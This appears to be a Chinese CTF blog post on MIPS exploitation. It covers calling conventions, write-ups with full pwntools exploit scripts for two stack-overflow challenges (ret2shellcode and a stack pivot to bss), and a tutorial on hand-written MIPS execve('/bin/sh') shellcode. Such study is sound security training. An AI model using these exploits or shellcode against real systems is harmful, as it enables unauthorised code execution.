<p>函数调用时传参：如果函数的参数小于等于四个，那么会使用 <code>$a0 ~ $a3</code> 寄存器来存放参数。如果参数多于四个，那么多于的参数则存放到栈里（同时也会预留出前四个参数的内存空间，因为被调用者使用前四个参数时，会统一将参数放到保留的栈空间），具体情况是函数 <code>A</code> 调用函数 <code>B</code> ，调用者函数（函数<code>A</code> ）会在自己的栈顶预留一部分空间来保存被调用者（函数 <code>B</code> ）的参数，称之为调用参数空间（如下）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305092258483.png" alt="image-20230509225831965" style="zoom:50%;" />



<p>函数 <code>A</code> 调用函数 <code>B</code>。如果 <code>B</code> 是叶子函数，那么在调用 <code>B</code> 函数时，会将 <code>B</code> 函数的返回地址存入 <code>$ra</code> 寄存器；如果 <code>B</code> 是非叶子函数（<code>B</code> 函数内部调用了一个 <code>C</code> 函数），那么在跳转到 <code>B</code> 函数时，会将其返回地址先存入 <code>$ra</code> 寄存器中，随后在 <code>B</code> 函数内部再将 <code>$ra</code> 寄存器的值存入栈中（位于 <code>fp-0x4</code> 的位置，如下图）。当 <code>B</code> 函数调用 <code>C</code> 函数时，会将其返回地址存入 <code>$ra</code> 寄存器，在返回时执行 <code>jr $ra</code> 指令回到 <code>B</code> 函数。现在假设 <code>B</code> 函数已经执行完毕准备返回到 <code>A</code> 函数，会将原先存入栈里的返回地址读到 <code>$ra</code> 寄存器中，最后执行 <code>jr $ra</code> 指令，回到 <code>A</code> 函数</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305092257102.png" alt="image-20230509225747069" style="zoom:50%;" />



<h3 id="题目练习"><a href="#题目练习" class="headerlink" title="题目练习"></a>题目练习</h3><h4 id="axb-2019-mips"><a href="#axb-2019-mips" class="headerlink" title="axb_2019_mips"></a>axb_2019_mips</h4><h5 id="保护策略"><a href="#保护策略" class="headerlink" title="保护策略"></a>保护策略</h5><p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112102666.png" alt="image-20230511210201613"></p>
<p>发现保护全关，并且是小端序</p>
<h5 id="解决报错"><a href="#解决报错" class="headerlink" title="解决报错"></a>解决报错</h5><p>尝试用 <code>qemu-mipsel ./pwn2</code> 运行时发现如下报错</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">qemu-mipsel: Could not open &#x27;/lib/ld-uClibc.so.0&#x27;: No such file or directory</span><br></pre></td></tr></table></figure>

<p>这表明在 <code>/lib</code> 目录下缺少 <code>ld-uClibc.so.0</code> 文件，我们使用 <code>file pwn2</code> 来查看一下文件信息（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112045280.png" alt="image-20230511204507118"></p>
<p>发现动态链接器的路径是 <code>/lib/ld-uClibc.so.0</code> ，而在这个位置没有找到 <code>ld-uClibc.so.0</code> ，我们使用 <code>sudo find / -name &quot;ld-uClibc.so.0&quot; 2&gt;/dev/null</code> 命令搜索一下，发现是有这个  <code>ld-uClibc.so.0</code> 文件的，只不过不在 <code>/lib</code> 目录下（如下图）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112049318.png" alt="image-20230511204913250"></p>
<p>因此创建一个软链接过去即可</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">sudo ln -s /home/zikh/Desktop/mipsel-linux-uclibc/lib/ld-uClibc.so.0 /lib/</span><br></pre></td></tr></table></figure>

<p>然后我们尝试再次运行 <code>pwn2</code></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">./qemu-mipsel ./pwn2                                   </span><br><span class="line">./pwn2: can&#x27;t load library &#x27;libc.so.0&#x27;</span><br></pre></td></tr></table></figure>

<p>这表明现在还缺少一个 <code>libc.so.0</code> 的库，我们使用 <code>ls /home/zikh/Desktop/mipsel-linux-uclibc/lib/</code> 命令，发现是有 <code>libc.so.0</code> 这个库的（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112028607.png" alt="image-20230511202846472"></p>
<p>因此我们依然给软链接到 <code>/lib</code> 目录下</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">sudo ln -s /home/zikh/Desktop/mipsel-linux-uclibc/lib/libc.so.0 /lib/ </span><br></pre></td></tr></table></figure>

<p>此时程序可以运行成功（如下图）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112030731.png" alt="image-20230511203036662" style="zoom:50%;" />

<h5 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h5><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112143512.png" alt="image-20230511214356466" style="zoom:50%;" />

<p>首先这里有一个 <code>read</code> 输入，随后 <code>printf</code> 函数是使用了 <code>%s</code> 将数据进行打印，在这里怀疑可能有机会泄露一些数据，我们通过调试验证一下（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112146239.png" alt="image-20230511214644840"></p>
<p>发现写入 <code>0x14</code> 字节的数据，确实可以顺带打印出来一个栈地址</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112147526.png" alt="image-20230511214754487"></p>
<p>随后发现 <code>vuln</code> 函数存在栈溢出漏洞（如上）</p>
<h5 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h5><p>因为有了栈地址，并且栈区是有可执行的权限，所以打一个常规的 <code>ret2shellcode</code></p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305120729296.png" alt="image-20230512072926146"></p>
<p>如上图所示，发现本地是通了的，因此思路没有任何问题，<code>EXP</code> 如下</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, endian=<span class="string">&#x27;little&#x27;</span>, word_size=<span class="number">32</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p=process([<span class="string">&quot;qemu-mipsel&quot;</span>,<span class="string">&quot;./pwn2&quot;</span>])</span><br><span class="line"><span class="comment">#p=remote(&quot;node4.buuoj.cn&quot;,25419)</span></span><br><span class="line"><span class="comment">#p=process([&quot;qemu-mipsel&quot;, &quot;-g&quot;, &quot;1234&quot;,&quot;./pwn2&quot;])</span></span><br><span class="line">offset=<span class="number">0x14</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*offset</span><br><span class="line">p.sendafter(<span class="string">&quot;What&#x27;s your name: \n&quot;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Hello!, &quot;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;a&#x27;</span>*offset)</span><br><span class="line">stack_addr=u32(p.recv().ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">log_addr(<span class="string">&quot;stack_addr&quot;</span>)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">shellcode = asm(shellcraft.mips.linux.sh(),arch=<span class="string">&#x27;mips&#x27;</span>)</span><br><span class="line">payload=<span class="string">b&quot;b&quot;</span>*<span class="number">0x24</span>+p32(stack_addr-<span class="number">0x50</span>)+shellcode</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()            </span><br></pre></td></tr></table></figure>





<p>不过这里在打远程的时候，明显发现泄露出来的并不是一个栈地址（因为本地和远程的环境不同，如下图），所以这个方法打远程是行不通的</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305120725360.png" alt="image-20230512072536085"></p>
<p>如果不泄露栈地址的话，我们考虑可以栈迁移到 <code>bss</code> 段上，并且往 <code>bss</code> 段写入 <code>shellcode</code></p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122036129.png" alt="image-20230512203620008"></p>
<p>通过分析上面的汇编发现， <code>read</code> 的第二个参数 <code>$a1</code> 由 <code>fp</code> 控制，而通过阅读 <code>read</code> 函数后的汇编代码，存在一句 <code>lw    $fp, 0x38($sp)</code> ，又因为此处有栈溢出，相当于我们有一次任意地址写的机会。我们选择往 <code>bss</code> 段写入 <code>shellcode</code> ，然后寻找迁移的机会，迁移到 <code>bss</code> 段的 <code>shellcode</code> 执行。</p>
<p>执行完程序原本的 <code>read</code> 函数后，有一句 <code>lw   $ra,0x3c($sp)</code> 的汇编，我们将距离栈顶 <code>0x3c</code> 的位置放成上面提到的 <code>lw   $fp,0x38($sp)</code> 指令地址，以此跳转过去</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122116335.png" alt="image-20230512211611122"></p>
<p>下图为向 <code>bss</code> 段写入数据的 <code>read</code> 函数</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122119885.png" alt="image-20230512211952663" style="zoom:50%;" />



<p>当 <code>read</code> 往 <code>bss</code> 段读入完数据后，执行了 <code>mov   $sp,$fp</code> ，此时栈进行了迁移（<code>fp</code> 是最初控制的那个 <code>bss</code> 段地址）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122118517.png" alt="image-20230512211852230"></p>
<p>随后下一条指令 <code>lw   $ra,0x3c($sp)</code> 将 <code>$ra</code> 的值再次进行了设置，因为 <code>$sp</code> 是可控的 <code>bss</code> 段地址，所以 <code>$ra</code> 依然可控，我们将 <code>$ra</code> 设置为 <code>shellcode</code> 的起始地址（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122127368.png" alt="image-20230512212720766"></p>
<p>但戏剧的是，这种打法导致了远程通了，本地没通。因为本题环境的原因，<code>bss</code> 段是没有可执行权限的，而远程的 <code>bss</code> 段是有可执行权限的。</p>
<h5 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context(arch=&#x27;mips&#x27;, os=&#x27;linux&#x27;, endian=&#x27;little&#x27;, word_size=32,log_level=&#x27;debug&#x27;)</span></span><br><span class="line"><span class="comment">#p=process([&quot;qemu-mipsel&quot;,&quot;./pwn2&quot;])</span></span><br><span class="line">p=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">25115</span>)</span><br><span class="line"><span class="comment">#p=process([&quot;qemu-mipsel&quot;, &quot;-g&quot;, &quot;1234&quot;,&quot;./pwn2&quot;])</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span></span><br><span class="line">p.sendafter(<span class="string">&quot;What&#x27;s your name: \n&quot;</span>,payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">shellcode = asm(shellcraft.mips.linux.sh(),arch=<span class="string">&#x27;mips&#x27;</span>)</span><br><span class="line">bss_addr=<span class="number">0x410ba0</span></span><br><span class="line">payload=<span class="string">b&quot;b&quot;</span>*<span class="number">0x20</span>+p32(bss_addr)+p32(<span class="number">0x4007E4</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*<span class="number">0x24</span>+p32(<span class="number">0x410be0</span>)+shellcode</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122131912.png" alt="image-20230512213146674"></p>
<h4 id="ycb-2020-mipspwn"><a href="#ycb-2020-mipspwn" class="headerlink" title="ycb_2020_mipspwn"></a>ycb_2020_mipspwn</h4><h5 id="保护策略-1"><a href="#保护策略-1" class="headerlink" title="保护策略"></a>保护策略</h5><p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142040351.png" alt="image-20230514204013277"></p>
<h5 id="利用思路-1"><a href="#利用思路-1" class="headerlink" title="利用思路"></a>利用思路</h5><p>本题与上一道的漏洞一样，同样是栈溢出。</p>
<p>采用的策略是打 <code>ret2shellcode</code></p>
<p>只不过本题的 <code>shellcode</code> 是手写的 <a href="#shellcode%E7%BC%96%E5%86%99">如何编写MIPS架构下的 shellcode</a> </p>
<h5 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, endian=<span class="string">&#x27;little&#x27;</span>, word_size=<span class="number">32</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="comment">#p=process([&quot;qemu-mipsel&quot;,&quot;./pwn2&quot;])</span></span><br><span class="line">p=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29366</span>)</span><br><span class="line"><span class="comment">#p=process([&quot;qemu-mipsel&quot;, &quot;-g&quot;, &quot;1234&quot;,&quot;./pwn2&quot;])</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span></span><br><span class="line">p.sendafter(<span class="string">&quot;Warrior,leave your name here:\n&quot;</span>,payload)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Your choice: &quot;</span>,<span class="built_in">str</span>(<span class="number">7</span>))</span><br><span class="line"></span><br><span class="line">bss_addr=<span class="number">0x4115F0</span></span><br><span class="line">p.sendafter(<span class="string">&quot;Write down your feeling:\n&quot;</span>,<span class="number">0x38</span>*<span class="string">b&#x27;b&#x27;</span>+p32(bss_addr)+p32(<span class="number">0x400F54</span>))</span><br><span class="line">shellcode = asm(shellcraft.mips.linux.sh(),arch=<span class="string">&#x27;mips&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">shellcode=<span class="string">b&quot;\x11\x01\x06\x24\xff\xff\xd0\x04\x00\x00\x06\x24\xe0\xff\xbd\x27\x14\x00\xe4\x27\x00\x00\x05\x24\xab\x0f\x02\x24\x0c\x00\x00\x00/bin/sh&quot;</span></span><br><span class="line">pause()</span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*<span class="number">0x3c</span>+p32(<span class="number">0x411648</span>)+shellcode</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142045142.png" alt="image-20230514204550938"></p>
<h3 id="shellcode编写"><a href="#shellcode编写" class="headerlink" title="shellcode编写"></a>shellcode编写</h3><h4 id="write-系统调用"><a href="#write-系统调用" class="headerlink" title="write 系统调用"></a><code>write</code> 系统调用</h4><p>我们先去尝试编写一段能够输出 <code>ABC\n</code> 字符串的 <code>shellcode</code></p>
<p>创建 <code>write.s</code> 文件，将下面的汇编代码写入文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">.section .text</span><br><span class="line">.globl __start</span><br><span class="line">.set noreorder</span><br><span class="line">__start:</span><br><span class="line">addiu $sp,$sp,-32</span><br><span class="line">lui $t6,0x4142</span><br><span class="line">ori $t6,$t6,0x430a</span><br><span class="line">sw $t6,0($sp)</span><br><span class="line">li $a0,1</span><br><span class="line">addiu $a1,$sp,0</span><br><span class="line">li $a2,5</span><br><span class="line">li $v0,4004</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>

<p> <code>.section .text</code> 指定了该段代码所在的节</p>
<p> <code>.globl __start</code> 表示将 <code>__start</code> 导出为全局符号（ <code>Global Symbol</code> ）。在C语言编写的程序中，程序的入口点通常被命名为 <code>_start</code>，而在汇编代码中通常使用 <code>__start</code></p>
<p> <code>.set noreorder</code> 禁止指令重排，确保汇编代码的执行顺序与源代码中指定的顺序一致。指令重排是编译器和处理器在优化代码执行速度时采用的一种技术，它可以改变指令的执行顺序，以便在不影响程序逻辑的情况下提高代码执行效率。</p>
<p><code>__start:</code> 是程序的入口点符号，在程序执行时将从这里开始执行指令。</p>
<p><code>addiu $sp,$sp,-32</code> 将开辟一个 <code>0x20</code> 大小的栈帧</p>
<p><code>lui $t6,0x4142</code> 是将 <code>0x4142</code> 左移 <code>16</code> 位后（也就是 <code>0x41420000</code> ）放入 <code>$t6</code> 寄存器。</p>
<p><code>ori $t6,$t6,0x430a</code> 将 <code>$t6</code> 与立即数 <code>0x430a</code> 进行或运算，所以 <code>$t6</code> 寄存器里会放 <code>0x4142430a</code> 这也就是 <code>ABC\n</code> 的 <code>ASCII</code> 码。</p>
<p>在看到这两条汇编语句的时候，我不禁疑惑起来，为什么不直接使用 <code>li $t6,0x4142430a</code> 指令呢，测试了一下编译链接之后的可执行文件依然是将这句指令转换成了 <code>lui $t6,0x4142   ori $t6,$t6,0x430a</code> ，最终查阅了资料发现在 <code>MIPS</code> 架构中立即数通常是 <code>16</code> 位的有符号整数（范围 <code>-32768 ~ 32767</code> ），如果需要使用一个超出这个范围的立即数，汇编器会自动将其拆分为两个 <code>16</code> 位的立即数，并使用 <code>lui</code> 和 <code>ori</code> 指令将其装载到寄存器中</p>
<p><code>sw $t6,0($sp)</code> 将 <code>ABC\n</code>这四个字符写入栈中</p>
<p><code>li $a0,1</code> 设置 <code>write</code> 系统调用的第一个参数，即标准输出流</p>
<p><code>addiu $a1,$sp,0</code> 将 <code>ABC\n</code> 的地址设置为 <code>write</code> 系统调用的第二个参数</p>
<p><code>li $a2,5</code> 设置 <code>write</code> 系统调用的第三个参数，即字符串长度为 <code>5</code> ，<code>ABC\n</code> 别忘记字符串末尾是还有一个 <code>\x00</code> 字符的</p>
<p><code>li $v0,4004</code> 设置 <code>$v0</code> 寄存器为 <code>write</code> 的系统调用号  <a target="_blank" rel="noopener" href="https://github.com/spotify/linux/blob/master/arch/mips/include/asm/unistd.h">查看 <code>MIPS</code> 架构的系统调用号</a></p>
<p><code>syscall</code> 触发系统调用</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">mips-linux-gnu-as write.s -o write.o</span><br><span class="line">mips-linux-gnu-ld write.o -o write</span><br></pre></td></tr></table></figure>

<p>上面两条命令首先使用汇编器 <code>mips-linux-gnu-as</code> 将 <code>write.s</code> 中的汇编代码转换为机器码（生成文件 <code>write.o</code> ），再用链接器 <code>mips-linux-gnu-ld</code> 将刚生成的 <code>write.o</code> 链接为 <code>write</code> 可执行文件。</p>
<p>为了简化汇编和链接的过程，我们来编写一个 <code>shell</code> 脚本，起名为 <code>nasm.sh</code>（如下）</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">src=$1</span><br><span class="line">dst=$2</span><br><span class="line">mips-linux-gnu-as $1 -o s.o</span><br><span class="line">echo &quot;as ok&quot;</span><br><span class="line">mips-linux-gnu-ld s.o -o $dst</span><br><span class="line">echo &quot;ld ok&quot;</span><br><span class="line">rm s.o</span><br></pre></td></tr></table></figure>

<p>这样将编写的 <code>shellcode</code> 文件，变成可执行文件只需要使用 <code>./nasm.sh write.s write</code> 命令即可（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305131404932.png" alt="image-20230513140452675"></p>
<p>可以看到 <code>ABC\n</code> 字符串已经被成功输出，程序崩溃的原因是因为 <code>shellcode</code> 没有正常的退出，导致执行了不正确指令让程序崩溃。 想调试 <code>shellcode</code> 的话，方式和调试 <code>MIPS</code> 架构的程序是一模一样的。</p>
<h4 id="execve-系统调用"><a href="#execve-系统调用" class="headerlink" title="execve 系统调用"></a><code>execve</code> 系统调用</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">.section .text</span><br><span class="line">.globl __start</span><br><span class="line">.set noreorder</span><br><span class="line">__start:</span><br><span class="line">li $a2,0x111</span><br><span class="line">p:bltzal $a2,p</span><br><span class="line">li $a2,0 </span><br><span class="line">addiu $sp,$sp,-32</span><br><span class="line">addiu $a0,$ra,20</span><br><span class="line">li $a1,0</span><br><span class="line">li $v0,4011</span><br><span class="line">syscall</span><br><span class="line">sc:</span><br><span class="line">    .byte 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68</span><br></pre></td></tr></table></figure>

<p>前四行的解释上面已经提过了，就不再赘述。</p>
<p><code>li $a2,0x111</code> <code>p:bltzal $a2,p</code>   <code>li $a2,0</code> 这三条指令的目的就是为了把 <code>addiu $sp,$sp,-32</code> 这条指令的地址放入 <code>$ra</code> 寄存器中。</p>
<p><code>addiu $sp,$sp,-32</code> 是为了开辟一个新的栈帧，大小为 <code>0x20</code></p>
<p><code>addiu $a0,$ra,20</code> 这个指令中的 <code>20</code> 很讲究，这就要牵扯到 <code>sc:</code> 以及后面的东西了<code>0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68</code> 就是字符串 <code>/bin/sh</code> 。而这个字符串也是存放到了 <code>text</code> 段，就位于 <code>syscall</code> 后面的地址。因为 <code>MIPS</code> 架构中一个指令是固定的 <code>4</code> 字节，上面提到的 <code>$ra</code> 寄存器存储了 <code>addiu $sp,$sp,-32</code> 的地址，而这个指令距离 <code>/bin/sh</code> 中间还有 <code>5</code> 个指令，<code>4*5 = 20</code> 字节。因此这里的 <code>$a0</code> 拿到了 <code>/bin/sh</code> 字符串的地址。</p>
<p>目的是执行 <code>execve(&quot;/bin/sh\x00&quot;,0,0)</code> ，所以我们将 <code>$a1</code> <code>$a2</code> 寄存器设置为 <code>0</code> ，使用 <code>li</code> 指令进行赋值即可，<code>execve</code> 系统调用号为 <code>4011</code>。</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142032761.png" alt="image-20230514203232473"></p>
<h4 id="shellcode的提取与测试"><a href="#shellcode的提取与测试" class="headerlink" title="shellcode的提取与测试"></a>shellcode的提取与测试</h4><p>将 <code>shellcode</code> 提取的话，我用的方法是将其放到 <code>IDA</code> 里面，然后 <code>shift+e</code> 提取（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142034440.png" alt="image-20230514203453331"></p>
<p>然后用下面的 <code>python</code> 脚本，<code>x</code> 列表里面放的是刚刚提前的数据，最后输出的内容便是 <code>shellcode</code> 字节码</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line">x = [  <span class="number">0x24</span>, <span class="number">0x06</span>, <span class="number">0x01</span>, <span class="number">0x11</span>, <span class="number">0x04</span>, <span class="number">0xD0</span>, <span class="number">0xFF</span>, <span class="number">0xFF</span>, <span class="number">0x24</span>, <span class="number">0x06</span>,</span><br><span class="line">  <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x27</span>, <span class="number">0xBD</span>, <span class="number">0xFF</span>, <span class="number">0xE0</span>, <span class="number">0x27</span>, <span class="number">0xE4</span>, <span class="number">0x00</span>, <span class="number">0x14</span>,</span><br><span class="line">  <span class="number">0x24</span>, <span class="number">0x05</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x24</span>, <span class="number">0x02</span>, <span class="number">0x0F</span>, <span class="number">0xAB</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line">  <span class="number">0x00</span>, <span class="number">0x0C</span>]</span><br><span class="line"><span class="built_in">list</span>=[]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Enter the endian of the shell code&quot;</span>)</span><br><span class="line">choice=<span class="built_in">input</span>()</span><br><span class="line"><span class="keyword">if</span> choice==<span class="string">&quot;little&quot;</span>:</span><br><span class="line">  <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(x),<span class="number">4</span>):</span><br><span class="line">    <span class="built_in">list</span>.extend(<span class="built_in">reversed</span>(x[i:i+<span class="number">4</span>]))</span><br><span class="line"><span class="keyword">if</span> choice==<span class="string">&quot;big&quot;</span>:</span><br><span class="line">  <span class="built_in">list</span> = x</span><br><span class="line">result = <span class="string">&#x27;&#x27;</span>.join([<span class="string">f&#x27;\\x<span class="subst">&#123;<span class="built_in">hex</span>(num)[<span class="number">2</span>:].zfill(<span class="number">2</span>)&#125;</span>&#x27;</span> <span class="keyword">for</span> num <span class="keyword">in</span> <span class="built_in">list</span>])</span><br><span class="line"><span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>

<p>最后就是测试提取出来的字节码能否正确执行，我们使用下面的 <code>C</code> 脚本（要<strong>注意编译完程序的字节序</strong>，如果程序是大端的，而 <code>shellcode</code> 是按照小端序写的，那么肯定是运行失败的）</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">//mips-linux-gnu-gcc shellcode.c -o test -static -g</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">char</span> shellcode[] = &#123;</span><br><span class="line"><span class="string">&quot;\x24\x06\x01\x11\x04\xd0\xff\xff\x24\x06\x00\x00\x27\xbd\xff\xe0\x27\xe4\x00\x14\x24\x05\x00\x00\x24\x02\x0f\xab\x00\x00\x00\x0c/bin/sh&quot;</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">void</span> (*s)(<span class="type">void</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;sc size %d\n&quot;</span>, <span class="keyword">sizeof</span>(shellcode));</span><br><span class="line">    s = shellcode;</span><br><span class="line">    s();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142127071.png" alt="image-20230514212707011"></p>
<h3 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h3><p><a target="_blank" rel="noopener" href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi">mips_arm汇编学习 - Note (gitbook.io)</a></p>
<p><a target="_blank" rel="noopener" href="https://prowes5.github.io/2019/07/21/%E8%B7%AF%E7%94%B1%E5%99%A8%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">路由器漏洞分析环境搭建 | Prowes5’s Blog</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/yalecaltech/article/details/117326975">(47条消息) MIPS下shellcode编写_Elwood Ying的博客-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.yuque.com/cyberangel/rg9gdm/yxb067">《IoT从入门到入土》(1)–MIPS交叉编译环境搭建及其32位指令集 (yuque.com)</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/MIPS%E6%9E%B6%E6%9E%84/" rel="tag"># MIPS架构</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/81a94eee.html" rel="prev" title="预测urandom的输出">
                  <i class="fa fa-chevron-left"></i> 预测urandom的输出
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/d1f081a9.html" rel="next" title="D-Link DIR-815路由器溢出漏洞分析">
                  D-Link DIR-815路由器溢出漏洞分析 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">ZIKH26</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  <script src="/js/third-party/pace.js"></script>


  





</body>
</html>
